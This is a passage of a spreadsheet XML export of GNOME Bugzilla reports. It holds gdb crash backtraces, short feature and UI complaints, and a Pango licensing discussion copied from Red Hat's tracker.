/usr/lib/libglib-2.0.so.0
No symbol table info available.
#44 0x40f08347 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#45 0x40f089b0 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#46 0x408a3d2f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#47 0x08157f8b in main ()
No symbol table info available.
#48 0x40f60dc6 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x40e6ebd8 in waitpid () from /lib/libpthread.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-03-12 03:20 -------
The original reporter (joshua@josh.is-a-geek.org) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jody@gnome.org.
</t>
  </si>
  <si>
    <t>GTHUMB-392234</t>
  </si>
  <si>
    <t>crash in gThumb Image Viewer: Adjusting brightness/con...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Adjusting brightness/contrast of an image I had just cropped (but not saved)
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 244727808 vsize: 0 resident: 244727808 share: 0 rss: 47919104 rss_rlim: 0
CPU usage: start_time: 1167819575 rtime: 0 utime: 927 stime: 0 cutime:891 cstime: 0 timeout: 36 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/gthumb'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1227618640 (LWP 13540)]
[New Thread -1461724256 (LWP 13558)]
[New Thread -1453331552 (LWP 13557)]
[New Thread -1444938848 (LWP 13556)]
[New Thread -1350874208 (LWP 13545)]
[New Thread -1267287136 (LWP 13542)]
(no debugging symbols found)
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb71e634b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7ec41b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0xb794cd9f in gtk_widget_queue_draw () from /usr/lib/libgtk-x11-2.0.so.0
#5  0x08064c44 in dlg_brightness_contrast ()
#6  0xb752da89 in g_cclosure_marshal_VOID__BOOLEAN ()
   from /usr/lib/libgobject-2.0.so.0
#7  0xb752079b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#8  0xb7530b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#9  0xb75320b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#10 0xb7532279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#11 0xb72196cd in gth_pixbuf_op_set_single_step () from /usr/lib/libgthumb.so
#12 0xb74a6aa1 in g_source_is_destroyed () from /usr/lib/libglib-2.0.so.0
#13 0xb74a8802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#14 0xb74ab7df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#15 0xb74abb89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#16 0xb782d574 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#17 0x080a3877 in main ()
Thread 6 (Thread -1267287136 (LWP 13542)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71e2816 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb72307a9 in image_loader_new () from /usr/lib/libgthumb.so
No symbol table info available.
#3  0xb74c638f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb71df504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb717351e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 5 (Thread -1350874208 (LWP 13545)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71e2816 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb72307a9 in image_loader_new () from /usr/lib/libgthumb.so
No symbol table info available.
#3  0xb74c638f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb71df504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb717351e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 4 (Thread -1444938848 (LWP 13556)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71e2816 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb72307a9 in image_loader_new () from /usr/lib/libgthumb.so
No symbol table info available.
#3  0xb74c638f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb71df504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb717351e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 3 (Thread -1453331552 (LWP 13557)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71e2816 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb72307a9 in image_loader_new () from /usr/lib/libgthumb.so
No symbol table info available.
#3  0xb74c638f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb71df504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb717351e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 2 (Thread -1461724256 (LWP 13558)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71e2816 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb72307a9 in image_loader_new () from /usr/lib/libgthumb.so
No symbol table info available.
#3  0xb74c638f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb71df504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb717351e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1227618640 (LWP 13540)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71e634b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7ec41b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xb794cd9f in gtk_widget_queue_draw () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#5  0x08064c44 in dlg_brightness_contrast ()
No symbol table info available.
#6  0xb752da89 in g_cclosure_marshal_VOID__BOOLEAN ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#7  0xb752079b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0xb7530b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0xb75320b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0xb7532279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0xb72196cd in gth_pixbuf_op_set_single_step () from /usr/lib/libgthumb.so
No symbol table info available.
#12 0xb74a6aa1 in g_source_is_destroyed () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#13 0xb74a8802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#14 0xb74ab7df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#15 0xb74abb89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#16 0xb782d574 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#17 0x080a3877 in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>snelting</t>
  </si>
  <si>
    <t>NAUTILUS-572604</t>
  </si>
  <si>
    <t>make nautilus explicitely depends on gthread</t>
  </si>
  <si>
    <t>Hi
When compiling nautilus g_thread_init is undefined at link time for me. I think it's because of the dependencies I use that do not pull gthread.
As nautilus actually uses gthread what about adding it to the CORE cflags and libs?
patch follows.</t>
  </si>
  <si>
    <t>GAL-200913</t>
  </si>
  <si>
    <t>Drag-selection in text cells does not autoscroll</t>
  </si>
  <si>
    <t>When you select a range of text in a cell the text does not scroll when you go
past the borders of the cell.  It does scroll if you use shift+arrow keys to
create the selection.</t>
  </si>
  <si>
    <t>EVOLUTION-418954</t>
  </si>
  <si>
    <t>Add a separate entry combo for port numbers</t>
  </si>
  <si>
    <t>I read yet another review where the write told that it's difficult to know how to specify a port for the SMTP server and/or the POP/IMAP server.
Basically no user knows that you have to add :port after the name of the server.</t>
  </si>
  <si>
    <t>EVOLUTION-230100</t>
  </si>
  <si>
    <t>Evolution crashes when modifying a filter</t>
  </si>
  <si>
    <t>Sorry for my English :
Description of Problem:
Evolution crashes when modifying a filter
Steps to reproduce the problem:
1.Open the 'Filter' window and double-click a filter to modify
   (The 'Edit Rule' window cannot be moved.)
2. Add an action : Move to folder (without selecting the action list)
3. Clic the button ''
Actual Results:
The 'Select Folder' window cannot be moved closed ....
Buttons the folder list the scrollbar don't work.
You have to close the 'Edit Rule' window then the 'Filter' window.
When you close the 'Select folder' window Evolution crashes
How often does this happen? 
Every times
Additional Information:
It does the same thing under Solaris but Evolution crashes when you close
the 'Select folder' window.</t>
  </si>
  <si>
    <t>airtri01</t>
  </si>
  <si>
    <t>RHYTHMBOX-132528</t>
  </si>
  <si>
    <t>Shuffle checkbox widget does not update</t>
  </si>
  <si>
    <t>This bug has been originally reported in the Debian BTS:
http://bugs.debian.org/229710
If you toggle the player's Shuffle status from the Control menu or by
keyboard shortcut (Ctrl+S) the Shuffle checkbox at the bottom of the main
player window will not update accordingly.  The player will shuffle while
the checkbox is empty or vice versa.
If you toggle the checkbox directly the menu item updates accordingly.</t>
  </si>
  <si>
    <t>GTK+-701463</t>
  </si>
  <si>
    <t>typo: a string containing the an approximation</t>
  </si>
  <si>
    <t>gdk/gdkevents.h:797: * @string: a string containing the an approximation
s/the an/an/</t>
  </si>
  <si>
    <t>pionchon.luc</t>
  </si>
  <si>
    <t>PANGO-481207</t>
  </si>
  <si>
    <t>pango license field should be fixed</t>
  </si>
  <si>
    <t>Please describe the problem:
https://bugzilla.redhat.com/show_bug.cgi?id=224135
Opened by Roozbeh Pournader (roozbeh@farsiweb.info)  	 on 2007-01-24 06:56 EST  	[reply]  	   Private
Description of problem:
Pango's license field says LGPL while it contains parts that are dual-licensed
as GPL and FreeType Project License.
Version-Release number of selected component (if applicable):
1.15.5-1.fc7
How reproducible:
Always
Steps to Reproduce:
1. rpm -q --qf %{LICENSE}\n pango
Actual results:
LGPL
Expected results:
GPL (or maybe something more descriptive)
Comment #1 From Behdad Esfahbod (besfahbo@redhat.com) 	on 2007-01-24 11:52 EST 	[reply] 	Private
That's true.  However setting to GPL would be very wrong.  For one it means you
cannot link non-FreeSoftware apps to Pango.
I've thought about this before and I think GPL+FreeType is a superset to LGPL
from the point of view of how you can('t) use the library.
Pango's license is LGPL \cap (GPL \cup FreeType).  If we agree that LGPL \subset
(GPL \cup FreeType) it gives Pango's license is LGPL.
Ok checked the FTL license and it seems that the only problem is the
advertising clause.  That is LGPL \subset (FTL sans advertising clause). 
However take a moment to think about what the advertising clause says:
    o You may not pretend that  you wrote this software.  If you use
      it or  only parts of it  in a program  you must acknowledge
      somewhere  in  your  documentation  that  you  have  used  the
      FreeType code. (`credits')
So this only applies to code or products embedding the code.  Not those linking
to it.  Right?  Given that LGPL includes the Copyright preservation rule I
believe you treating FTL code as LGPL fulfils the FTL license completely. 
(There is a minor issue though that the Copyright holders of the code are the
individual authors of FreeType not the FreeType project.  So you can tactically
remove any mention of FreeType just leave the copyright holders...).
Anyway if anything's to change it should be the GPL+FTL license.  I decided to
do that by replacing the code instead of replacing the license.
Comment #2 From Roozbeh Pournader (roozbeh@farsiweb.info) 	on 2007-01-26 08:38 EST 	[reply] 	Private
Random snippets from discussions on fedora-extras-list:
Christopher Stone:
&gt; I had this discussion on IRC a few days ago and the conclusion was you
&gt; either label it as GPL or split the package up into a sub package
&gt; that has the LGPL parts.
Ralf Corsepius:
&gt; Fundamental counter-question: Do the GPL infected parts of pango impose
&gt; the GPL on non-GPL'ed applications being linked against it?
&gt; 
&gt; If yes then this would be the end of gtk and GNOME definitely the end
&gt; of pango.
Comment #3 From Roozbeh Pournader (roozbeh@farsiweb.info) 	on 2007-01-26 09:18 EST 	[reply] 	Private
(In reply to comment #1)
&gt; That's true.  However setting to GPL would be very wrong.  For one it means
&gt; you cannot link non-FreeSoftware apps to Pango.
I think your license discussions are quite wild. I don't think I can follow some
parts of it. Also I don't know what is the *intended* usage of the license
field in the RPM really but it could be used in many ways which includes both
How may I link against it? (like the license of packages that Require: pango)
and How may I extend it? (like the license of patches that extend it). Some
details below:
&gt; Pango's license is LGPL \cap (GPL \cup FreeType). [...]
Depends on how you define a license as a set. It seems that your are defining
the set members as things that the license allows you to do (which not very
well-defined because that is mostly defined in different copyright and patent
laws and depends on the jurisdiction) which we can call the license's freedoms. 
In that case the part in the parentheses should be GPL *or* FreeType. You
can't have all the freedoms the GPL and the FTL licenses give you. You can
either have the freedoms offered by the GPL or the freedoms offered by the FTL
or the intersection of the freedoms offered by the two.
&gt; [...] So this only applies to code or products embedding the code.  Not those
&gt; linking to it.  Right?
Assuming that you are not missing other requirements of the FTL which may make
it incompatible with GPL/LGPL the license field in the RPM is not necessarily
about what may be linked to the library in the RPM. It's also about how may the
RPM be extended I believe.
&gt; Anyway if anything's to change it should be the GPL+FTL license.  I decided
&gt; to do that by replacing the code instead of replacing the license.
That would quite help the occasional headache that I get when I encounter this
case again and again. Thanks a lot.
But before that please consider using a license field saying something like this:
LGPL and (GPL or FreeType Public License)
... or consider packaing the GPL/FTL parts separately (/me hides).
Comment #4 From Michael Schwendt (bugs.michael@gmx.net) 	on 2007-01-26 10:39 EST 	[reply] 	Private
Let's put the RPM License: tag aside for a moment please.
If authors choose double-licensing this ought to become clear in
the header of the source files too.
If any source file is GPL'ed (according to its file header for
instance) the combined work must be GPL'ed too. This is a MUST
and is in accordance with the licence terms of the GPL. You cannot
relicense or sublicense the GPL'ed files and neither the combined
work. The combined work cannot be LGPL either because the LGPL and
the GPL are not equivalent and not interchangable. The LGPL is *less*
restrictive in that you can use the source in proprietary programs.
This would be in violation of the licence terms which applies to
GPL'ed portions of the source code which require the combined work
to be GPL'ed too.
Comment #5 From Behdad Esfahbod (besfahbo@redhat.com) 	on 2007-01-26 14:33 EST 	[reply] 	Private
All the comments other than roozbeh's own words are missing some point of the
problem.
Comment #6 From Roozbeh Pournader (roozbeh@farsiweb.info) 	on 2007-01-27 04:06 EST 	[reply] 	Private
(In reply to comment #4)
&gt; If any source file is GPL'ed (according to its file header for
&gt; instance) the combined work must be GPL'ed too. [...]
Sure. But no file is strictly GPL'ed. Only some of the files are double licensed
GPL and FTL. The code is here:
http://svn.gnome.org/viewcvs/pango/trunk/pango/opentype/
The file headers say different things: some don't mention the license (like
harfbuzz-buffer.c) and some say LGPL (like harfbuzz-dump.c) but most refer to
the file COPYING which says choose either GPL (version 2 only) or the FreeType
License for the subdirectory.
Comment #7 From Michael Schwendt (bugs.michael@gmx.net) 	on 2007-01-27 05:16 EST 	[reply] 	Private
All that matters is that _when you choose_ a licence from the
(GPL FTL) upon reusing the dual-licensed files in a _valid_ way
do you choose the licence of your derived product in an
irreversible way? E.g. LGPL =&gt; GPL and FTL =&gt; LGPL are both an
irreversible change in the licensing.
If you proceed in accordance with the terms of the FTL (since you
cannot return from GPL to LGPL) and _relicense_ your work under
the LGPL are they fully compatible? (cf. sections 4-6 of the LGPL)
[...]
Extracting and reusing multi-licensed individual source files is
a gray area and a different topic (especially wrt unmodified files).
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>lizhang</t>
  </si>
  <si>
    <t>ANJUTA-518329</t>
  </si>
  <si>
    <t>Crash when try add breakpoint in empty project</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Run anjuta. Do not open any project.
2. Add breakpoint
Stack trace:
Console output:
** (anjuta:32699): CRITICAL **: breakpoint_item_new_from_uri: assertion `uri != NULL' failed
Segmentation fault (core dumped)
$gdb anjuta
GNU gdb 6.6-debian
This GDB was configured as i486-linux-gnu...
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(gdb) run
Starting program: /usr/local/bin/anjuta 
[Thread debugging using libthread_db enabled]
[New Thread -1226856784 (LWP 32725)]
[New Thread -1263846512 (LWP 32731)]
** Message: Profiler: Activating Profiler plugin ...
** Message: Tools Plugin: Activating tools plugin...
** (anjuta:32725): CRITICAL **: breakpoint_item_new_from_uri: assertion `uri != NULL' failed
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1226856784 (LWP 32725)]
0xb4167f88 in breakpoints_dbase_edit_breakpoint (bd=0x8628b38 bi=0x0)
    at breakpoints.c:1465
1465            if (bi-&gt;uri != NULL)
(gdb)
Other information:
Program build with ./configure --enable-debug</t>
  </si>
  <si>
    <t>yuriy.penkin</t>
  </si>
  <si>
    <t>GNOMORADIO-56679</t>
  </si>
  <si>
    <t>gnomoradio</t>
  </si>
  <si>
    <t>can select 2 songs at once</t>
  </si>
  <si>
    <t>when you select the current song unselect upcoming_songs and vice versa</t>
  </si>
  <si>
    <t>mattgerg</t>
  </si>
  <si>
    <t>EVOLUTION-205409</t>
  </si>
  <si>
    <t>Deleting a contact list causes crash</t>
  </si>
  <si>
    <t>It looks like weird memory corruption... I get a totally different
backtrace every time.</t>
  </si>
  <si>
    <t>GNOME-SESSION-329361</t>
  </si>
  <si>
    <t>Enter key is not associated properly</t>
  </si>
  <si>
    <t>In the gnome-session-properties application window goto the Startup Programs
tab. Select Add. I should be able to enter a command and press [Enter] to
select the OK button. Unfortunately the OK button is not set to react to
the [Enter] key. I have to tab to it or press -O to accept the change.
Please associate the [Enter] key with the OK button.
Other information:</t>
  </si>
  <si>
    <t>ceagan</t>
  </si>
  <si>
    <t>EVOLUTION-204216</t>
  </si>
  <si>
    <t>mailer encrypts with wrong public PGP key</t>
  </si>
  <si>
    <t>When sending a signed/encrypted message from Evolution (using GnuPG 1.0.6)
the resultant message always seems to be encrypted with the *sender's*
public key instead of the *recipient's* public key.  The recipient is
unable to decrypt the message as they do not have my secret key.</t>
  </si>
  <si>
    <t>EVOLUTION-439951</t>
  </si>
  <si>
    <t>Retrieving message blurb in message preview pane needs to be centered</t>
  </si>
  <si>
    <t>The new Retrieving message blurb on imap access needs to be
1. bigger
2. in gray
3. centered on the message space
to be consistent with what other GNOME apps (evinceâ€¦) do for transient notification
evolution-2.11.2-1.fc8.x86_64
Other information:</t>
  </si>
  <si>
    <t>Nicolas.Mailhot</t>
  </si>
  <si>
    <t>GSTREAMER-120609</t>
  </si>
  <si>
    <t>[PATCH] Hardcoded CFLAGS cause grief</t>
  </si>
  <si>
    <t>Some plugins have hardcoded -mcpu=i486 in their x86 CFLAGS this can cause
compilation problems in combination with other CFLAGS. I talked to someone
on #gstreamer about this a while ago (forgot who) and he said it was
probably ok to remove the hardcoded flags. Here's a patch to do that vs.
0.6.2 .
See for problem report http://bugs.gentoo.org/show_bug.cgi?id=22249 .</t>
  </si>
  <si>
    <t>mschraal</t>
  </si>
  <si>
    <t>GTKHTML-240898</t>
  </si>
  <si>
    <t>Crash: assertion reading spam</t>
  </si>
  <si>
    <t>Package: GtkHtml
Priority: Normal
Version: GNOME2.2.0 1.3.1.99
os_details: Gnome.Org
Synopsis: assertion reading spam
Bugzilla-Product: GtkHtml
Bugzilla-Component: Rendering
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
reading some spam triggered this assertion.
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-1.3'
[New Thread 1024 (LWP 14485)]
[New Thread 2049 (LWP 14488)]
[New Thread 1026 (LWP 14489)]
[New Thread 2051 (LWP 14490)]
[New Thread 3076 (LWP 14491)]
[New Thread 4101 (LWP 14492)]
[New Thread 6150 (LWP 14495)]
0x410574d9 in wait4 () from /lib/libc.so.6
#0  0x410574d9 in wait4 () from /lib/libc.so.6
#1  0x410cf30c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4007183a in waitpid () from /lib/libpthread.so.0
#3  0x40477cd5 in libgnomeui_segv_handle (signum=6) at
gnome-ui-init.c:646
#4  0x4006f307 in pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x40fd50a1 in kill () from /lib/libc.so.6
#7  0x4006efe6 in raise () from /lib/libpthread.so.0
#8  0x40fd6364 in abort () from /lib/libc.so.6
#9  0x40f6f95c in g_logv () from /usr/lib/libglib-2.0.so.0
#10 0x40f6fa03 in g_log () from /usr/lib/libglib-2.0.so.0
#11 0x40efc0d2 in pango_shape () from /usr/lib/libpango-1.0.so.0
#12 0x4040ace3 in html_get_glyphs_non_tab (glyphs=0x0 item=0xbcb12d0 
    text=0x40417f64 &gt;  bytes=2 len=2) at htmltextslave.c:626
#13 0x403ee3ba in html_gdk_painter_text_itemize_and_prepare_glyphs (
    painter=0xb4a7dd8 desc=0xbb72298 text=0x40417f64 &gt;  bytes=2 
    glyphs=0xbfffdd88) at htmlgdkpainter.c:96
#14 0x403ee428 in text_width (painter=0xb4a7dd8 desc=0xbb72298 
    text=0x40417f64 &gt;  bytes=2) at htmlgdkpainter.c:133
#15 0x403ee8b4 in alloc_font (painter=0xb4a7dd8 face=0xb2e4550 5 
    size=12.5 points=0 style=12) at htmlgdkpainter.c:231
#16 0x403fa33f in html_painter_alloc_font (painter=0xb4a7dd8 
    face_name=0xb2e4550 5 size=12.5 points=0 style=12)
    at htmlpainter.c:592
#17 0x403eda2a in manager_alloc_font (manager=0xb4a7de4 face=0xb2e4550
5 
    style=12) at htmlfontmanager.c:263
#18 0x403edafe in alloc_new_font (manager=0xb4a7de4 set=0xbfffdeb8 
    face_list=0xbc31238 5 style=12) at htmlfontmanager.c:296
#19 0x403edc5f in html_font_manager_get_font (manager=0xb4a7de4 
    face_list=0xbc31238 5 style=12) at htmlfontmanager.c:335
#20 0x403f91d0 in html_painter_get_font (painter=0xb4a7dd8 
    face=0xbc31238 5 style=12) at htmlpainter.c:284
#21 0x404077c5 in html_text_get_items (text=0xbd131a0
painter=0xb4a7dd8)
    at htmltext.c:916
#22 0x40407875 in calc_min_width (self=0xbd131a0 painter=0xb4a7dd8)
    at htmltext.c:934
#23 0x403f662e in html_object_calc_min_width (o=0xbd131a0
painter=0xb4a7dd8)
    at htmlobject.c:941
#24 0x403ca280 in calc_min_width (o=0xb97e540 painter=0xb4a7dd8)
    at htmlclueflow.c:646
#25 0x403f662e in html_object_calc_min_width (o=0xb97e540
painter=0xb4a7dd8)
    at htmlobject.c:941
#26 0x403c86ec in calc_min_width (o=0xb93a058 painter=0xb4a7dd8)
    at htmlclue.c:363
#27 0x403cefb0 in calc_min_width (o=0xb93a058 painter=0xb4a7dd8)
    at htmlcluev.c:306
#28 0x40405408 in calc_min_width (o=0xb93a058 painter=0xb4a7dd8)
    at htmltablecell.c:154
#29 0x403f662e in html_object_calc_min_width (o=0xb93a058
painter=0xb4a7dd8)
    at htmlobject.c:941
#30 0x404016f7 in calc_column_width_step (table=0x98c3c50
painter=0xb4a7dd8 
    array=0x43f4dd88 sizes=0xb60f520 
    calc_fn=0x403f6614  span=1) at
htmltable.c:859
#31 0x404019a2 in calc_column_width_template (table=0x98c3c50 
    painter=0xb4a7dd8 array=0x43f4dd88 
    calc_fn=0x403f6614  pref=0x43f4dd88)
    at htmltable.c:910
#32 0x40402908 in calc_min_width (o=0x98c3c50 painter=0xb4a7dd8)
    at htmltable.c:1325
#33 0x403f662e in html_object_calc_min_width (o=0x98c3c50
painter=0xb4a7dd8)
    at htmlobject.c:941
#34 0x403ca280 in calc_min_width (o=0xb13d8e8 painter=0xb4a7dd8)
    at htmlclueflow.c:646
#35 0x403f662e in html_object_calc_min_width (o=0xb13d8e8
painter=0xb4a7dd8)
    at htmlobject.c:941
#36 0x403c86ec in calc_min_width (o=0xbceae80 painter=0xb4a7dd8)
    at htmlclue.c:363
#37 0x403cefb0 in calc_min_width (o=0xbceae80 painter=0xb4a7dd8)
    at htmlcluev.c:306
#38 0x40405408 in calc_min_width (o=0xbceae80 painter=0xb4a7dd8)
    at htmltablecell.c:154
#39 0x403f662e in html_object_calc_min_width (o=0xbceae80
painter=0xb4a7dd8)
    at htmlobject.c:941
#40 0x404016f7 in calc_column_width_step (table=0xbeae9b8
painter=0xb4a7dd8 
    array=0xacba564 sizes=0xb799368 
    calc_fn=0x403f6614  span=1) at
htmltable.c:859
#41 0x404019a2 in calc_column_width_template (table=0xbeae9b8 
    painter=0xb4a7dd8 array=0xacba564 
    calc_fn=0x403f6614  pref=0xacba564)
    at htmltable.c:910
#42 0x40402908 in calc_min_width (o=0xbeae9b8 painter=0xb4a7dd8)
    at htmltable.c:1325
#43 0x403f662e in html_object_calc_min_width (o=0xbeae9b8
painter=0xb4a7dd8)
    at htmlobject.c:941
#44 0x403ca280 in calc_min_width (o=0xb574170 painter=0xb4a7dd8)
    at htmlclueflow.c:646
#45 0x403f662e in html_object_calc_min_width (o=0xb574170
painter=0xb4a7dd8)
    at htmlobject.c:941
#46 0x403c86ec in calc_min_width (o=0xba4bdf0 painter=0xb4a7dd8)
    at htmlclue.c:363
#47 0x403cefb0 in calc_min_width (o=0xba4bdf0 painter=0xb4a7dd8)
    at htmlcluev.c:306
#48 0x40405408 in calc_min_width (o=0xba4bdf0 painter=0xb4a7dd8)
    at htmltablecell.c:154
#49 0x403f662e in html_object_calc_min_width (o=0xba4bdf0
painter=0xb4a7dd8)
    at htmlobject.c:941
#50 0x404016f7 in calc_column_width_step (table=0x9ea9ec0
painter=0xb4a7dd8 
    array=0x4285b868 sizes=0xb85e1f0 
    calc_fn=0x403f6614  span=1) at
htmltable.c:859
#51 0x404019a2 in calc_column_width_template (table=0x9ea9ec0 
    painter=0xb4a7dd8 array=0x4285b868 
    calc_fn=0x403f6614  pref=0x4285b868)
    at htmltable.c:910
#52 0x40402908 in calc_min_width (o=0x9ea9ec0 painter=0xb4a7dd8)
    at htmltable.c:1325
#53 0x403f662e in html_object_calc_min_width (o=0x9ea9ec0
painter=0xb4a7dd8)
    at htmlobject.c:941
#54 0x40403cb0 in html_table_set_max_width (o=0x9ea9ec0
painter=0xb4a7dd8 
    max_width=0) at htmltable.c:1754
#55 0x403f6541 in html_object_set_max_width (o=0x9ea9ec0
painter=0xb4a7dd8 
    max_width=0) at htmlobject.c:897
#56 0x403ca1cd in set_max_width (o=0xb5741e8 painter=0xb4a7dd8
max_width=0)
    at htmlclueflow.c:625
#57 0x403f6541 in html_object_set_max_width (o=0xb5741e8
painter=0xb4a7dd8 
    max_width=0) at htmlobject.c:897
#58 0x403cf05f in set_max_width (o=0xaf21f20 painter=0xb4a7dd8
max_width=0)
    at htmlcluev.c:325
#59 0x403f6541 in html_object_set_max_width (o=0xaf21f20
painter=0xb4a7dd8 
    max_width=0) at htmlobject.c:897
#60 0x403ea044 in html_engine_calc_size (e=0x8578910 changed_objs=0x0)
    at htmlengine.c:4388
#61 0x403e924d in html_engine_update_event (e=0x8578910) at
htmlengine.c:3926
#62 0x403e963b in html_engine_timer_event (e=0x8578910) at
htmlengine.c:4074
#63 0x403e9701 in html_engine_stream_end (stream=0xafeceb8 
    status=GTK_HTML_STREAM_OK data=0x8578910) at htmlengine.c:4123
#64 0x403bbb59 in gtk_html_stream_close (stream=0xafeceb8 
    status=GTK_HTML_STREAM_OK) at gtkhtml-stream.c:130
#65 0x403c1a8b in gtk_html_end (html=0x81a7e08 handle=0xafeceb8 
    status=GTK_HTML_STREAM_OK) at gtkhtml.c:3176
#66 0x41341e77 in on_url_requested (html=0x81a7e08 
    url=0xbad3fd8 cid:@@@197 handle=0xafeceb8 user_data=0x856caf8)
    at mail-display.c:1297
#67 0x403f4f58 in html_g_cclosure_marshal_VOID__STRING_POINTER (
    closure=0x8578c70 return_value=0x0 n_param_values=3 
    param_values=0xbfffeb70 invocation_hint=0xbfffea78
marshal_data=0x0)
    at htmlmarshal.c:120
#68 0x40f18dca in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#69 0x40f2bcff in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#70 0x40f2a502 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#71 0x40f2a77f in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#72 0x403bc2c7 in html_engine_url_requested_cb (engine=0x8578720 
    url=0xad1ae10 cid:@@@197 handle=0xafeceb8 data=0x81a7e08)
    at gtkhtml.c:430
#73 0x403f4f58 in html_g_cclosure_marshal_VOID__STRING_POINTER (
    closure=0x8578620 return_value=0x0 n_param_values=3 
    param_values=0xbffff020 invocation_hint=0xbfffef28
marshal_data=0x0)
    at htmlmarshal.c:120
#74 0x40f18dca in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#75 0x40f2bcff in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#76 0x40f2a502 in g_signal_emit_valist () from
